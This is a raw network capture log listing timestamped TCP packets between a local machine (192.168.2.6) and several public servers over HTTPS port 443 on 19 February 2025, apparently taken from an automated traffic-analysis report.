                                    Feb 19, 2025 20:40:06.993089914 CET44349727142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:40:06.993206978 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993401051 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993484974 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993537903 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:06.993556023 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993599892 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:06.993607998 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993727922 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.993767023 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:06.993772984 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.994071007 CET44349727142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:40:06.994134903 CET49727443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:40:06.994148016 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.994189024 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:06.994199991 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.994283915 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.994329929 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:06.994335890 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:06.995409012 CET49727443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:40:06.995479107 CET44349727142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:40:07.000596046 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.000653982 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.000667095 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.038362026 CET49727443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:40:07.038378954 CET44349727142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:40:07.040936947 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.040981054 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041008949 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041034937 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041060925 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041079044 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.041131973 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041176081 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.041176081 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.041486979 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041897058 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041920900 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.041948080 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.041965008 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.042042971 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.045722008 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.045768976 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.045824051 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.045840979 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.050961971 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.058104038 CET44349730104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.058263063 CET44349730104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.058336973 CET49730443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.058768034 CET49730443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.058809996 CET44349730104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.060555935 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.060585022 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.060692072 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.060960054 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.060976028 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.081325054 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081358910 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081399918 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081403971 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.081423998 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081448078 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081458092 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.081478119 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.081489086 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.081509113 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.081531048 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.082817078 CET49727443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:40:07.083156109 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.083208084 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.083235025 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.083247900 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.083293915 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.097949028 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305078030 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305147886 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305183887 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305222988 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305222034 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305258989 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305274010 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305342913 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305385113 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305389881 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305399895 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305433035 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305438042 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305608988 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305634022 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305665016 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305665970 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305674076 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305694103 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305711031 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305732965 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305737019 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305741072 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305766106 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305773020 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305778980 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305799961 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305804014 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305808067 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.305833101 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.305836916 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.306274891 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.306307077 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.306356907 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.306358099 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.306382895 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.306394100 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.306416035 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.306442976 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.307600021 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.307643890 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.307668924 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.307681084 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.307712078 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.307735920 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.307797909 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.307876110 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.307883024 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.307995081 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.308047056 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.309171915 CET49728443192.168.2.6151.101.66.137
                                    Feb 19, 2025 20:40:07.309189081 CET44349728151.101.66.137192.168.2.6
                                    Feb 19, 2025 20:40:07.311420918 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.311461926 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.311479092 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.311485052 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.311521053 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.311525106 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.311568022 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.311640978 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.318499088 CET49731443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.318530083 CET44349731104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.325078011 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.325146914 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.325535059 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.325535059 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.325620890 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.333034992 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.333061934 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.333183050 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.333498955 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.333515882 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.544799089 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.585150957 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.585172892 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.585796118 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.599013090 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.599246979 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.599251032 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.642541885 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.642559052 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721177101 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721224070 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721256018 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721283913 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721312046 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721333981 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721384048 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.721407890 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721424103 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.721622944 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.721659899 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.721668005 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.726455927 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.726491928 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.726561069 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.726572990 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.728595972 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.808553934 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.808615923 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.808881044 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.808912039 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.808931112 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.808952093 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.808964968 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.809391022 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809506893 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809531927 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809544086 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.809555054 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809566975 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.809585094 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809607029 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.809637070 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.809645891 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810678005 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810707092 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810731888 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.810741901 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810755968 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.810781956 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810803890 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.810834885 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.810842037 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.811260939 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.811292887 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.811300039 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.811310053 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.811333895 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.818097115 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.855087042 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.855122089 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.855184078 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.855201006 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.872088909 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.897738934 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.897927999 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.926467896 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.926495075 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.927854061 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.927875042 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.927939892 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.933087111 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.933177948 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.933990002 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.934010029 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:07.937764883 CET49734443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:07.937788010 CET44349734104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:07.972610950 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.976464987 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:07.989423990 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.989444971 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.992898941 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:07.995590925 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.996218920 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:07.998819113 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.034161091 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036099911 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036137104 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036159039 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036191940 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036237955 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.036237955 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.036250114 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.036338091 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.039992094 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.042845964 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.042879105 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.042908907 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.042921066 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.043261051 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.045051098 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.045984030 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.046032906 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.046302080 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.046322107 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.084762096 CET49743443192.168.2.6104.16.2.189
                                    Feb 19, 2025 20:40:08.084804058 CET44349743104.16.2.189192.168.2.6
                                    Feb 19, 2025 20:40:08.084919930 CET49743443192.168.2.6104.16.2.189
                                    Feb 19, 2025 20:40:08.085777044 CET49743443192.168.2.6104.16.2.189
                                    Feb 19, 2025 20:40:08.085794926 CET44349743104.16.2.189192.168.2.6
                                    Feb 19, 2025 20:40:08.097839117 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.124553919 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.124629974 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.124747992 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.124759912 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125036001 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125266075 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.125276089 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125457048 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125488997 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125507116 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.125564098 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.125564098 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.125581026 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.126410961 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.126458883 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.126458883 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.126470089 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.126609087 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.147679090 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147736073 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147763968 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147784948 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147809982 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147835970 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147855997 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.147855997 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.147860050 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147872925 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147886992 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.147912979 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147943020 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.147963047 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.148001909 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.148001909 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.148010969 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.148185968 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.148195028 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.148226976 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148262978 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148293018 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148319006 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148319006 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.148333073 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148376942 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148397923 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148421049 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148423910 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.148423910 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.148432970 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148507118 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.148514032 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.148741007 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.163579941 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.166490078 CET49747443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:08.166527987 CET44349747104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:08.166593075 CET49747443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:08.167992115 CET49747443192.168.2.6104.18.95.41
                                    Feb 19, 2025 20:40:08.168014050 CET44349747104.18.95.41192.168.2.6
                                    Feb 19, 2025 20:40:08.191663027 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.207336903 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.207350969 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.213392019 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.213450909 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.213558912 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.213602066 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.213617086 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.213644028 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.213957071 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.213965893 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.214081049 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.214087963 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.216118097 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.216162920 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.216181993 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.216217995 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.216238022 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.216463089 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.217677116 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.217730999 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.217770100 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.217770100 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.217771053 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.217941999 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.218724012 CET49742443192.168.2.6151.101.194.137
                                    Feb 19, 2025 20:40:08.218736887 CET44349742151.101.194.137192.168.2.6
                                    Feb 19, 2025 20:40:08.234255075 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.234280109 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.234347105 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.234359026 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.234735012 CET44349741104.17.24.14192.168.2.6
                                    Feb 19, 2025 20:40:08.234736919 CET49741443192.168.2.6104.17.24.14
                                    Feb 19, 2025 20:40:08.234745979 CET44349741104.17.24.14192.168.2.6
